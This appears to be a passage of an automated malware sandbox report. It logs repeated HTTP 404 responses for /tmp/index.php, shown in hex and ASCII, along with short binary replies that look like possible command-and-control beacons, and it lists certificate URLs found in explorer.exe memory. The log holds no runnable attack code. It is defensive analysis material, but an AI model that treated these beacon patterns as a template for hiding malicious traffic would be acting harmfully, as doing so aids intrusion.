                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:40:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:40:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:40:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:41:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: explorer.exe, 00000002.00000000.1506409569.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: explorer.exe, 00000002.00000000.1504585767.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
                  Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                  Source: explorer.exe, 00000002.00000000.1504054456.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1505677351.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1505690894.0000000007720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
